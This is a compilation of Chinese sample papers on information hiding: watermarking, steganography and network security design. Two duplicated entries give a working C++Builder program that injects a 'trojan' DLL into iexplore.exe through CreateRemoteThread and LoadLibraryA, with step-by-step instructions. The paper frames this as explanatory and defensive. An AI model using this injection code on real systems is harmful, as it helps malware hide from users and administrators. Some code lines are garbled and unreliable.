经过变化,8个字节便隐藏了一个字节的信息,这样就能很好地将信息隐藏在位图中了。当然逆向提取隐藏信息需要花费更长的时间。

2.LSB水印提取

LSB(最低有效位)算法是在位图法的基础上将输入的信号打乱,并按照一定的分配规则使嵌入的信息能够散布于图像的所有像素点上,增加破坏和修改水印的难度。水印信号嵌入模型如图2,水印信号检测模型如图3。

3.DCT变换域算法

DCT变换域算法是这一类算法的总称,在它下面的具体的算法会有一些不同。下面介绍一种基于模运算的数字水印算法。该方法将水印作为二值图像(每一像元只有两种可能的数值或者灰度等级状态的图像)进行处理,依据图像在进行DCT变换后系数的统计来选取适当的阈值,通过模处理加入水印。此算法的特点是在水印检测时不需要原始图像(如图4)。

模拟主动水印攻击教学过程

通过基础知识的学习,学生对信息隐藏技术已经有了一定的了解,为了加深记忆,使知识应用得更好,在这部分课程最后增加了一个模拟主动水印攻击的教学模块。该模块主要应用前期的知识完成。常见的水印攻击方法有:移去攻击、几何攻击、密码攻击、协议攻击(如图5)。

通过模拟攻击实验,学生对数字隐藏技术有了更深的了解,对各种算法增加了兴趣。并在课堂上针对结果展开讨论。下页图6为实验模拟攻击后的有效结果之一。

选用LSB或者DCT进行水印攻击,测试可以显示如下页图6效果。

教学成效

通过对课程中信息隐藏技术教学的改进,学生对比较难懂的数字水印部分内容有了更深一步的了解。通过改革,不仅充分调动了学生的积极性,培养了自学能力,开发了创新能力,还锻炼了学生的团队合作意识和实践能力。攻击中涉及算法的选择、操作的选择、速度的快慢,学生都能通过团队合作完成。学生在实践过程中强烈感受到了成功感和自信感。

结束语

本文以信息隐藏技术内容教学为例,阐述了三种不同的信息隐藏技术的基本知识点,分析了它们之间的关联性和区别,提高了学生的团队合作能力和创新思维的培养,加强了学生的学习兴趣。此外,本模式将教学与科研能力培养相融合,更多地引发了学生的思考。该教学模式可推广到其他课程中。

参考文献:

[1]李继芳,奚李峰,董晨.IPR―CDIO环境的计算机工程教育研究[J].计算机教育,2009(18).

[2]李继芳,奚李峰,殷伟凤,高昆.基于合作式学习的计算机导论课程教学[J].计算机教育,2008(10).

[3]于学斗.以CDIO为指导进行网络安全实验教学改革[J].计算机时代,2010(5).

隐藏技术论文范文第10篇

关键词:电子信息 信息隐藏 原理与特点 保密性 安全系统设计

1 电子信息隐藏技术的原理与特点

1.1 基本原理

信息隐藏不同于传统的密码学技术。密码技术主要是研究如何将机密信息进行特殊的编码,以形成不可识别的密码形式进行传递;信息隐藏则主要研究如何将某一机密信息秘密隐藏于另一公开的信息中,然后通过公开信息的传输来传递机密信息。

对加密通信而言,可能的监测者或非法拦截者可通过截取密文,并对其进行破译,或将密文进行破坏后再发送,从而影响机密信息的安全;但对信息隐藏而言,可能的监测者或非法拦截者因难以从公开信息中判断机密信息是否存在而无法截获机密信息,从而能保证机密信息的安全。信息隐藏技术主要由信息嵌入算法和隐蔽信息提取算法组成。

1.2 隐藏的特点

信息隐藏不同于传统的加密,其目的不在于限制正常的资料存取,而在于保证隐藏数据不被侵犯和发现。

另外由于信息隐藏必须考虑隐藏的信息在经历各种环境、操作之后,仍需具有免遭破坏的能力,因此信息隐藏技术必须考虑正常的信息操作所造成的威胁,其关键是要使隐藏信息部分不易被正常的数据操作(如通常的信号变换或数据压缩)所破坏。所以信息隐藏必须具有下列特性:

1.2.1 隐蔽性

这是对信息隐藏的基本要求,它是指嵌入信息后在不引起原始信息质量下降的前提下,不显著改变遮掩信息的外部特征,即不引起人们视觉上对载体信息的变化的觉察,亦即指隐蔽载体与原始载体具有一致的特性。如具有一致的统计噪声分布等,以便使非法拦截者无法判断是否有隐蔽信息的存在。

1.2.2 鲁棒性

即要求嵌入待隐信息的方法具有一定的稳定性,其稳定性是指被隐藏的信息不会因图象文件的某种改动(如传输过程中的信道噪音、滤波操作、重采样、有损编码压缩、DA、AD转换等)而导致隐藏信息的丢失。

1.2.3 安全性

指隐藏算法具有较强的抗攻击能力, 即它必须能够承受一定程度的人为攻击, 而使隐藏信息不会被破坏。

1.2.4 自恢复性

由于经过一些操作或变换后, 可能会使原图产生较大的破坏,如果只留下的片段数据,仍能恢复隐藏信号,而且恢复过程不需要宿主信号,这就是所谓的自恢复性。

1.3 信息隐藏的分类

信息隐藏可以分为:隐蔽信道、隐写术、匿名通信和版权标记。隐蔽信道即是用那些不打算传递信息的信道来传输信息。例如:在某个多级安全的操作系统中,较高安全级别的进程A通过选择合适的文件名和文件大小来向较低安全级别的进程B发送信息。

隐写术就是将秘密信息隐蔽到另一个看似普通的信息中,从而隐蔽真实信息的存在以达到安全通信目的。匿名通信就是通过隐蔽通信源和目的的信息来达到信息隐蔽的目的。例如:匿名邮件转发器和网络。

版权标记则是在数字化的产品中嵌入标记信息以达到保护版权的目的。健壮性的版权标记包括数字指纹和数字水印。数字水印还可以根据应用领域不同而划分为许多具体的分类,例如用于版权保护的鲁棒水印,用于保护数据完整性的易损水印等。

2 网络信息安全系统设计探讨

网络信息安全是实现信息与信息系统安全的基础和信息安全保障体系的核心。如果没有一个科学合理和配置完整的高水平网络信息安全系统,实现网络信息安全就无从谈起。研究设计基于信息隐藏技术的网络信息安全系统,可以充分利用信息隐藏技术的许多优良特性,使系统具有很强的安全性和保密性。

2.1 系统设计原理

网络信息安全系统以普通信息为载体,利用信息的冗余特性在其中嵌入秘密信息,然后利用现有的传输网络将隐藏含有秘密信息的伪装信息传输到目的地,接收端从中提取出秘密信息。系统工作框图如图1所示。

首先对网络信息载体进行变换处理,然后利用密钥和一定的嵌入算法在处理过的网络信息中嵌入秘密信息,最后将伪装的网络信息进行包装,送到网络信道进行传输。接收方接收到信息后,先通过密钥检测以确定信息嵌入位置,然后利用相应的提取算法提取出秘密信息。

2.2 系统主要模块及功能

基于以上系统设计原理和网络自身的特点,系统主要由以下模块构成(图1)。

2.2.1 信息加密模块

信息加密是政府、军事、安全等部门必须考虑的问题。密码技术是传统保密通信的主要手段。但单独采用此技术还存在一些问题,一是密码算法的原理是计算不可行的数学问题,但随着数学科学的发展和计算机技术的进步,这些问题变得容易求解了。因此,以前提出的一些算法现在可以被破解了。

二是加密只是使秘密信息不可读,掩盖的是秘密信息本身,并未隐藏通信存在的事实。密码通信照样容易招来敌方的注意并引起攻击。有时,敌方虽然暂时破译不了,但仍然可以对它进行破坏甚至摧毁。

在信息隐藏通信中,除了传统的加密变换外,还提供了另外的两层保护:数据隐藏技术的伪装作用和隐藏数据检测与提取的困难性。由于隐藏信息的不可感知性,敌方要在信道传输的大量信息中判断是否有秘密信息是非常困难的。即使感觉到这种存在,如果隐藏算法不知道,进一步提取隐藏数据也是十分困难的。

2.2.2 数字签名模块

数字签名技术是实现网络交易安全的核心技术之一,它的实现基础是加密技术。以往的书信或文件是根据亲笔签名或印章来证明其真实性。同理,在网络中传输信息也要进行“盖章”,这就是数字签名要解决的问题。

即将发送者的身份隐藏到所传输的信息中,其他人无法对其进行仿造或破坏,接收方通过提前预知的算法对其进行提取,从而识别发送方的真实身份。在许多场合下,数据的真实性比数据的保密性更加重要。比如在战场环境下下达作战命令时,该命令的有效性将取决于这份命令中是否有数字签名以及这种签名是否容易被伪造。

2.2.3 用户识别和安全认证模块

利用网络对信息进行处理和传输,仅仅加密是不够的,全面的保护还要求能认证和识别。它确保参与保密通信的接受者是其本人。这就需要采用安全卡和身份鉴别。前一个安全保护能确保只有经过授权的用户才能通过计算机进行因特网上的交互式交易;后者则提供一种方法把它生成某种形式的口令或数字签名,交易的另一方据此来认证他的交易伙伴。

2.2.4 信息检测模块

应用信息隐藏技术的检测功能,监听传输信道上的数据包,监测信息资源的使用情况,记录信息状态及操作行为,对非法用户进行跟踪、报警,防止来自外部的安全攻击及内部的泄密行为。安全检测是采用隐写分析技术检测信道中是否有采用信息隐藏技术进行非法传输的信息。目的是发现含有隐藏信息的数据并将其过滤掉,阻止不法者的破坏。

2.3 系统运用的信息隐藏方法

随着信息隐藏技术的成熟,信息隐藏方法也逐渐增多,在使用时可以根据使用者要求和目的不同对隐藏方法进行选择。在设计网络信息安全系统时主要可以采用以下信息隐藏方法。

2.3.1 利用网络协议数据隐藏信息

基于开放系统互连模型(Open System Interconnect Reference Model,OSI)的网络协议可以用来隐藏信息。传输控制协议/网间协议(Transmission Control Protocol/Internet Protocol,TCP/IP)包在因特网中传输信息时,包头结构中有一些未用的位:在TCP/IP 头中有6个保留位,在IP头中有二个保留位。

在每一个传输通道中有成千上万的包,可以用这些保留位来传输隐藏信息,起到秘密通信的目的。这种利用网络协议隐藏和传递信息的方法具有很强的鲁棒性和安全性。

2.3.2 利用多媒体传递信息

系统使用的多媒体主要包括文本文件、视频、图像及声音载体等,在利用多媒体传递秘密信息时,发送方将秘密信息经过加密嵌入到所选定的多媒体的噪声成份中,通过传输路线将伪装对象传递给接收方。

接收方利用相应的密钥把秘密信息提取出来,从而实现隐蔽通信。此外,为了控制秘密信息在系统中的访问权限和意外失泄密,必须对密钥的使用进行严格的控制。对于不同密级的信息在嵌入伪装载体时采用不同的密钥,同时对于不同的用户根据其访问权限赋予不同的密钥。

2.3.3 利用基于异常检测技术进行安全检测

基于异常的隐藏信息检测系统记录用户通信的活动,并且根据这些记录创建活动的统计报告。如果报告表它与正常用户的使用有明显不同,那么检测系统会将这样的活动视为通信过程含有隐藏信息。

基于异常的检测系统试图建立一个对应“正常的活动”的特征原型,然后把所建立的特征原型中差别“很大”的行为标志为异常。这种隐藏信息检测方法的一种典型的运用是:基于用户通信行为概率统计模型的隐藏信息检测。

它基于对用户历史行为建模以及在早期的证据或模型的基础上,审计系统实时地检测用户通信数据和过程,根据系统内部保存的用户行为概率统计模型检测用户的行为。系统根据每个用户以前的历史行为,生成历史行为记录库,当用户改变他们的行为习惯时,这种异常就会被检测出来。

3 结论

随着信息隐藏技术的不断提高,对理论指导的期待已经越来越迫切。信息隐藏技术特别是在迫切需要解决的版权保护问题上将会发挥无法替代的重要作用,相信在不久的将来信息隐藏技术会更加完善,将会在信息安全体系中发挥它巨大的作用。

隐藏技术论文范文第11篇

关键字进程 线程 木马 动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了windows nt/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现windows nt/2000系统中进程的隐藏。

1 基本原理

在win95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在windows nt/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过windows nt/2000的任务管理器,windows nt/2000的任务管理器均能轻松显示出木马进程,难道在windows nt/2000下木马真的再也无法隐藏自己的进程了?我们知道,在windows系统下,可执行文件主要是exe和com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和socket已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。www.133229.COm在windows nt/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2 实现方法

为了弄清实现方法,我们必须首先了解windows系统的另一种"可执行文件"----dll,dll是dynamic link library(动态链接库)的缩写,dll文件是windows的基础,因为所有的api函数都是在dll中实现的。dll文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为dll文件不能独立运行,所以在进程列表中并不会出现dll,假设我们编写了一个木马dll,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马dll,如果那个进程是可信进程,(例如浏览器程序iexplore.exe,没人会怀疑它是木马吧?)那么我们编写的dll作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行dll方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口hook、挂接api、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过createthread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过createremotethread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3 实施步骤

1) 用process32next()函数找到宿主进程,获取宿主进程id,并用

openprocess()函数打开宿主进程。

2) 用virtualallocex()函数分配远程进程地址空间中的内存。

3) 用writeprocessmemory()函数将待隐藏的dll的路径名。

4) 拷贝到步骤二已经分配的内存中。

5) 用getprocaddress()函数获取loadlibrarya()函数的实地址(在kernel32.dll中)。

6) 用createremotethread()函数在远程进程中创建一个线程。

7) 它调用正确的loadlibrarya()函数。

8) 为它传递步骤二中分配的内存地址。

4 具体实例

下面是在c++builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include <vcl.h>

#include <windows.h>

#include <stdio.h>

#include <tlhelp32.h>//该头文件包涵了进程操作的api函数

#pragma hdrstop

#include "unit1.h"

#pragma package(smart_init)

#pragma resource "*.dfm"

insisting pszlibfilename;//存放待隐藏的dll文件名

handle hprocesssnap=null;//进程快照句柄

handle hremoteprocess;//远程进程句柄

lpvoid pszlibfileremote;//远程进程中分配给文件名的空间

hmodule phmd;//存放kernel32.dll句柄

handle hremotethread1=null;//存放远程线程句柄

tform1 *form1;

//---------------------------------------------------------

__fast call tform1::tform1(tcomponent* owner)

: tform(owner)

{

}

//---------------------------------------------------------

void __fastcall tform1::button1click(tobject *sender

{

processentry32 pe32={0};

dword dwremoteprocessid;

hprocesssnap=createtoolhelp32snapshot(th32cs_snapprocess,0);

//打开进程快照

if(hprocesssnap==(handle)-1)

{

messagebox(null,"createtoolhelp32snapshot failed","",mb_ok);

exit(0);

} //失败返回

pe32.dwsize=sizeof(processentry32);

if(process32first(hprocesssnap,&pe32)) //获取第一个进程

{

do{

ansistring te;

te=pe32.szexefile;

if(te.pos("iexplore.exe")|| te.pos("iexplore.exe"))

//找到宿主进程,以iexplore.exe为例

{ dwremoteprocessid=pe32.th32processid;

break;

}

}

while(process32next(hprocesssnap,&pe32));//获取下一个进程

}

else

{

messagebox(null,"取第一个进程失败","",mb_ok);

exit(0);

}

hremoteprocess=openprocess(process_create_thread|process_vm

_operation|process_vm_write,false,dwremoteprocessid);

//打开远程进程

pszlibfilename=getcurrentdir()+"\\"+"hide.dll";

// 假设hide.dll是待隐藏的进程

int cb=(1+pszlibfilename.length())*sizeof(char);//计算dll文件名长度

pszlibfileremote=(pwstr)virtualallocex(hremoteprocess,null,cb,

mem_commit,page_readwrite);

//申请存放文件名的空间

bool returncode=writeprocessmemory(hremoteprocess,

pszlibfileremote,(lpvoid)pszlibfilename.c_str(),cb,null);

//把dll文件名写入申请的空间

phmd=getmodulehandle("kernel32.dll");

lpthread_start_routine fnstartaddr=(lpthread_start_routine)

getprocaddress(phmd,"loadlibrarya");

//获取动态链接库函数地址

hremotethread1=createremotethread(hremoteprocess,null,0,

pfnstartaddr,pszlibfileremote,0,null);

//创建远程线

if(hremotethread1!=null)

closehandle(hremotethread1);//关闭远程线程

if(hprocesssnap!=null)

closehandle(hprocesssnap);//关闭进程快照

}

该程序编译后命名为rmtdll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在c++builder4.0环境下编写并编译了下面的hide.dll作为测试:

#include <vcl.h>

#include <windows.h>

#pragma hdrstop

#pragma argsused

bool winapi dllentrypoint(hinstance hinst, unsigned long reason, void* lpreserved)

{

char szprocessid[64];

switch(reason)

{

case dll_process_attach:

{//获取当前进程id

itoa(getcurrentprocessid(),szprocessid,10);

messagebox(null,szprocessid,"remotedll",mb_ok);

break;

}

default:

}

return true;

}

当使用rmtdll.exe程序将这个hide.dll嵌入iexplore.exe进程后假设pid=1208),该测试dll弹出了1208字样的确认框,同时使用ps工具

也能看到:

process id: 1208

c:\winnt\iexplore.exe (0x00400000)

……

c:\winnt\hide.dll (0x100000000)

……

这证明hide.dll已经在iexplore.exe进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5 结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

1 jeffrey richter著 王建华、张焕生、侯丽坤等译 windows核心编程 机械工业出版社2

隐藏技术论文范文第12篇

关键字进程 线程 木马 动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了windows nt/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现windows nt/2000系统中进程的隐藏。

1 基本原理

在win95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在windows nt/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过windows nt/2000的任务管理器,windows nt/2000的任务管理器均能轻松显示出木马进程,难道在windows nt/2000下木马真的再也无法隐藏自己的进程了?我们知道,在windows系统下,可执行文件主要是exe和com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和socket已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在windows nt/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2 实现方法

为了弄清实现方法,我们必须首先了解windows系统的另一种"可执行文件"----dll,dll是dynamic link library(动态链接库)的缩写,dll文件是windows的基础,因为所有的api函数都是在dll中实现的。dll文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为dll文件不能独立运行,所以在进程列表中并不会出现dll,假设我们编写了一个木马dll,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马dll,如果那个进程是可信进程,(例如浏览器程序iexplore.exe,没人会怀疑它是木马吧?)那么我们编写的dll作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行dll方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口hook、挂接api、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过createthread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过createremotethread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3 实施步骤

1) 用process32next()函数找到宿主进程,获取宿主进程id,并用

openprocess()函数打开宿主进程。

2) 用virtualallocex()函数分配远程进程地址空间中的内存。

3) 用writeprocessmemory()函数将待隐藏的dll的路径名。

4) 拷贝到步骤二已经分配的内存中。

5) 用getprocaddress()函数获取loadlibrarya()函数的实地址(在kernel32.dll中)。

6) 用createremotethread()函数在远程进程中创建一个线程。

7) 它调用正确的loadlibrarya()函数。

8) 为它传递步骤二中分配的内存地址。

4 具体实例

下面是在c++builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include <vcl.h>

#include <windows.h>

#include <stdio.h>

#include <tlhelp32.h>//该头文件包涵了进程操作的api函数

#pragma hdrstop

#include "unit1.h"

#pragma package(smart_init)

#pragma resource "*.dfm"

insisting pszlibfilename;//存放待隐藏的dll文件名

handle hprocesssnap=null;//进程快照句柄

handle hremoteprocess;//远程进程句柄

lpvoid pszlibfileremote;//远程进程中分配给文件名的空间

hmodule phmd;//存放kernel32.dll句柄

handle hremotethread1=null;//存放远程线程句柄

tform1 *form1;

//---------------------------------------------------------

__fast call tform1::tform1(tcomponent* owner)

: tform(owner)

{

}

//---------------------------------------------------------

void __fastcall tform1::button1click(tobject *sender

{

processentry32 pe32={0};

dword dwremoteprocessid;

hprocesssnap=createtoolhelp32snapshot(th32cs_snapprocess,0);

//打开进程快照

if(hprocesssnap==(handle)-1)

{

messagebox(null,"createtoolhelp32snapshot failed","",mb_ok);

exit(0);

} //失败返回

pe32.dwsize=sizeof(processentry32);

if(process32first(hprocesssnap,&pe32)) //获取第一个进程

{

do{

ansistring te;

te=pe32.szexefile;

if(te.pos("iexplore.exe")|| te.pos("iexplore.exe"))

//找到宿主进程,以iexplore.exe为例

{ dwremoteprocessid=pe32.th32processid;

break;

}

}

while(process32next(hprocesssnap,&pe32));//获取下一个进程

}

else

{

messagebox(null,"取第一个进程失败","",mb_ok);

exit(0);

}

hremoteprocess=openprocess(process_create_thread|process_vm

_operation|process_vm_write,false,dwremoteprocessid);

//打开远程进程

pszlibfilename=getcurrentdir()+"\\"+"hide.dll";

// 假设hide.dll是待隐藏的进程

int cb=(1+pszlibfilename.length())*sizeof(char);//计算dll文件名长度

pszlibfileremote=(pwstr)virtualallocex(hremoteprocess,null,cb,

mem_commit,page_readwrite);

//申请存放文件名的空间

bool returncode=writeprocessmemory(hremoteprocess,

pszlibfileremote,(lpvoid)pszlibfilename.c_str(),cb,null);

//把dll文件名写入申请的空间

phmd=getmodulehandle("kernel32.dll");

lpthread_start_routine fnstartaddr=(lpthread_start_routine)

getprocaddress(phmd,"loadlibrarya");

//获取动态链接库函数地址

hremotethread1=createremotethread(hremoteprocess,null,0,

pfnstartaddr,pszlibfileremote,0,null);

//创建远程线

if(hremotethread1!=null)

closehandle(hremotethread1);//关闭远程线程

if(hprocesssnap!=null)

closehandle(hprocesssnap);//关闭进程快照

}

该程序编译后命名为rmtdll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在c++builder4.0环境下编写并编译了下面的hide.dll作为测试:

#include <vcl.h>

#include <windows.h>

#pragma hdrstop

#pragma argsused

bool winapi dllentrypoint(hinstance hinst, unsigned long reason, void* lpreserved)

{

char szprocessid[64];

switch(reason)

{

case dll_process_attach:

{//获取当前进程id

itoa(getcurrentprocessid(),szprocessid,10);

messagebox(null,szprocessid,"remotedll",mb_ok);

break;

}

default:

}

return true;

}

当使用rmtdll.exe程序将这个hide.dll嵌入iexplore.exe进程后假设pid=1208),该测试dll弹出了1208字样的确认框,同时使用ps工具

也能看到:

process id: 1208

c:\winnt\iexplore.exe (0x00400000)

……

c:\winnt\hide.dll (0x100000000)

……

这证明hide.dll已经在iexplore.exe进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5 结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

1 jeffrey richter著 王建华、张焕生、侯丽坤等译 windows核心编程 机械工业出版社2

隐藏技术论文范文第13篇

关键词:数字图像;信息隐藏;空域;变换域

中图分类号:TP391 文献标识码:A文章编号:1007-9599 (2011) 16-0000-02

Information Hiding Technology Research Based on Digital Image

Si Yingshuo,Yang Wentao,Zhang Sen

(Zhengzhou Institute of Aeronautical Industry Management,Zhengzhou450046,China)

Abstract:Security of information transmission is becoming more and more important along with the development of media digitized and network technology.In this paper,we mainly studied the information hiding technology based on digital images,and analyzed the advantages and disadvantages of spatial domain hiding algorithm and transform domain hiding algorithm.

Keywords:Digital Image;Information hiding;Spatial domain;Transform domain

一、信息隐藏的基本原理

信息隐藏技术通常使用文字、图像、声音及视频等作为载体,信息之所以能够隐藏在多媒体数据中,主要是利用了多媒体信息的时间或空间冗余性和人对信息变化的掩蔽效应。

(一)多媒体信息本身存在很大的冗余性,从信息论的角度看,未压缩的多媒体信息的编码效率是很低的,所以将某些信息嵌入到多媒体信息中进行秘密传送是完全可行的,并不会影响多媒体信息本身的传送和使用。(二)人的视觉或听觉感官系统对某些信息都有一定的掩蔽效应。在亮度有变化的边缘上,该边界“掩蔽”了边缘邻近像素的信号感觉,使人的感觉变得不灵敏、不准确,这就是视觉掩蔽效应[2]。通常人眼对灰度的分辨率只有几十个灰度级,对边缘附近的信息不敏感。利用这些特点,可以很好地将信息隐藏而不被觉察。

随着多媒体技术的迅速发展,图像成为信息表达的主要方式,数字图像大量存在,因而被研究最多的是图像中的信息隐藏,而且,图像信息隐藏所研究的方法往往经过改进可以轻易地移植到其他的载体中[1],是研究其他载体的隐藏算法的基础。因此,对基于数字图像的信息隐藏技术的研究成为了当前信息隐藏领域的一个研究热点。

二、基于数字图像的信息隐藏基础知识

(一)数字图像的概念。随着数字技术的不断发展和应用,许多信息都可以用数字形式进行处理和存储,数字图像就是以数字形式进行存储和处理的图像。数字图像可看作是平面区域上的二元函数Z=F(x,y),(x,y)∈R。在绝大多数情况下区域R是一个矩形。对R中任意的点(x,y),则F(x,y)代表图像的信息(如灰度值,RGB分量值等)。表示图像的二元函数有其特殊性,这就是相关性。在图像被数字化之后,Z=F(x,y)则相应于一个矩阵,其元素所在的行与列对应于自变量取值,元素本身代表图像信息。(二)数字图像信息隐藏模型。图像信息隐藏通过将秘密信息做适当的预处理后,利用合理的嵌入机制将信息隐藏在可公开的图像媒体信息中,达到传递秘密信息的目的,即信息隐藏将“正在通信”的事实隐蔽起来,从而逃过拦截者的破解。信息隐藏必然会引起载体图像一定的失真,如果失真过大就会被视觉感知,因此不可见性或者说不可感知性是衡量信息隐藏技术的重要标准。

图像信息隐藏将秘密信息隐藏或变换成另一非机密性的图像文件中,使得加入秘密信息的目标图像看起来难以察觉到有变化,这种隐藏的可能性除了来自于人眼视觉的掩蔽特性外,还有一个原因就是图像数据的数据冗余。图像数据中存在很多与有用信息无关的数据,即所谓的数据冗余,如果能够有效地利用这些冗余数据嵌入信息,就能达到很好的隐藏效果,图像信息隐藏的一般模型如图1所示:

图1:图像信息隐藏的一般模型

三、基于数字图像的信息隐藏算法

根据秘密信息嵌入域的不同,图像信息隐藏算法主要分为两大类:空域信息隐藏算法和变换域信息隐藏算法,二者在数据的嵌入原理上有根本的区别[3]。基于空域的信息隐藏算法通过直接改变图像某些像素的值来嵌入信息,具有较大的容量和较好的不可见性,但是安全性不高;基于变换域的信息隐藏算法通过改变某些图像变换域的系数来嵌入信息,变换域的方法在近来以至今后,都是信息隐藏算法的主流。

(一)空域信息隐藏技术。空域隐藏技术是指将秘密信息嵌入数字图像的空间域中,即对像素灰度值进行修改以隐藏秘密信息。

1.LSB算法。最低有效位(Least Significant Bits,LSB)方法是最早提出来的最基本的空域图像信息隐藏算法,许多其它的空域算法都是从它的基本原理进行改进扩展的,使得LSB方法成为使用最为广泛的隐藏技术之一。其原理是最不重要数据的调整对载体图像的影响很小,在视觉上无法察觉。LSB算法中,载体图像的LSB平面先被置0,然后根据要嵌入的秘密数据修改为“1”或不变,直至嵌入完成。嵌入数据后,载体图像部分像素的最低一个或多个位平面的数值被秘密信息所替换。

LSB算法每个像素点可以隐藏一比特、两比特甚至三比特的信息,达到了一个较大的隐藏容量及较好的不可见性,随机间隔法选择嵌入位置提高了算法的秘密性,这些特点为信息隐藏算法的研究提供了一定的参考。但是,LSB算法鲁棒性较差,给应用带来了一定的限制。

2.Patchwork算法。另一种空域信息隐藏算法是Bender等提出的直接扩频隐藏算法Patchwork。扩频算法为图像像素添加噪声,并且不需要改变噪声的统计特征就可以在每个噪声成分中隐藏一个比特。算法步骤如下:(1)用一个密钥K初始化一个伪随机数发生器;(2)根据随机数发生器的输出,随机选取n个像素对,其灰度值表示为(ai,bi);(3)令 ,完成信息嵌入。检测时,假设检验被用来证实秘密信息的存在。令(2.1)

如果 ,判定秘密信息存在。

Patchwork的检测方法基于如下统计假设:图像中随机选取的像素,其灰度值是独立同分布的。如果在一副图像中随机选取像素对,则统计量S的期望值为

(2.2)

对于已知位置的像素对,S≈2n。

Patchwork算法改进了LSB算法改变图像统计特性的不足,但是隐藏容量较小,容易受到各种综合攻击的影响,只能应用在某些需要嵌入少量信息的场合。为了增加算法的鲁棒性,一种改进的方法是将图像分块后,再嵌入秘密信息,算法的鲁棒性和不可见性都会增加。

总的来说,空域信息隐藏算法具有较好的不可见性和较高的隐藏容量,计算速度快,但鲁棒性较差,对于载体图像的压缩、噪声扰动等攻击的抵抗力较弱,很多研究更倾向于基于变换域的信息隐藏算法。

(二)变换域信息隐藏技术

